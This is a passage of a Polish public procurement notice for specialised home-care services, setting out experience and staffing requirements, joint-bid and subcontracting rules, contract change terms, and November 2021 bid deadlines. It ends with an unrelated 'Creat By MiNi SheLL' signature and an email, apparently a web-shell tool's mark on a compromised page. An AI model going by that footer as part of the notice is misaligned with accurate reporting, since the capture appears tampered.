porównywalnych z usługami stanowiącymi przedmiot zamówienia, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert Za minimalny poziom zdolności uznane zostanie wykazanie przez Wykonawcę, że: a) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty co najmniej jedno zamówienie polegające na świadczeniu w miejscu zamieszkania lub pobytu specjalistycznych usług opiekuńczych w ilości nie mniejszej niż 6 000 godzin maksymalnie w skali 12 miesięcy wraz z podaniem jego przedmiotu, dat wykonania/wykonywania i podmiotów, na rzecz których usługi te zostały wykonane/są wykonywane oraz załączy dowody określające, że świadczone w miejscu zamieszkania lub pobytu specjalistyczne usługi opiekuńcze zostały wykonane lub są wykonywane należycie. b) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego,a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami. Za minimalny poziom zdolności uznane zostanie wykazanie przez Wykonawce, że dysponuje osobami zdolnymi do realizacji zamówienia, tj. minimum 10 osobami, posiadającymi kwalifikacje określone wymaganiami Rozporządzenia Ministra Polityki Społecznej w sprawie specjalistycznych usług opiekuńczych z dnia 22.09.2005r. tj. wszystkie osoby przedstawione w wykazie posiadają co najmniej kwalifikacje do wykonywania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi. 3.Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami, wykaz, o którym mowa powyżej dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.3.2 Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane 3.3 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały określone) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują usługi do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w ust. 3.2 i 3.3 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które z usług wykonają poszczególni Wykonawcy. Uwaga: Pełnomocnictwo, o którym mowa powyżej (pkt.3.1) może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.a) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).b) W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia, to znaczy, że:1) Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;2) Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.5.1 Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. 5.2 Wykonawca jest zobowiązany wskazać w formularzu ofertowym części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podać nazwy ewentualnych podwykonawców, o ile są już znane. W przypadku, gdy Wykonawca nie zamierza wykonywać zamówienia przy udziale podwykonawców, należy wpisać w druku oferty „nie dotyczy” lub inne podobne sformułowanie. Jeżeli Wykonawca zostawi nie wypełnione miejsce (puste pole), Zamawiający uzna, że Wykonawca wykona zamówienie bez udziału podwykonawców.5.3 W przypadku zmiany podwykonawcy na którego zasoby powołał się Wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu Wykonawca jest zobowiązany wykazać Zamawiającemu, że proponowany nowy podwykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powołał się w prowadzonym postępowaniu o udzielenie zamówienia. Szczegółowy opis w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności.<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku:<br/>a) zmiany terminu wykonania zamówienia na skutek wystąpienie siły wyższej rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej,<br/>b) zmiany podatku VAT:<br/>- w przypadku zwiększenia stawki podatku VAT: cena jednostkowa brutto określona w § 9 pkt 1 umowy zostanie odpowiednio powiększone w odniesieniu do ceny zadeklarowanej w druku ofertowym. Maksymalna nominalna wartość umowy może ulec zwiększeniu,<br/>- w przypadku zmniejszenia stawki podatku VAT: cena jednostkowa brutto określona w § 9 pkt 1 umowy zostanie odpowiednio pomniejszona w odniesieniu do ceny zadeklarowanej w druku ofertowym. Maksymalna nominalna wartość umowy może ulec zmniejszeniu,<br/><br/>3. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony. Przy czym w przypadku zmiany NIPu, REGONu, nr konta bankowego wystarczającym jest poinformowanie drugiej strony o tym fakcie w formie pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mops-dg.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-09 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przyzna zamówienie Wykonawcy, który złoży ofertę niepodlegającą odrzuceniu i która zostanie najwyżej oceniona (uzyska największa liczbę punktów przyznanych według kryteriów wyboru oferty określonych w SWZ.)

Creat By MiNi SheLL
Email: jattceo@gmail.com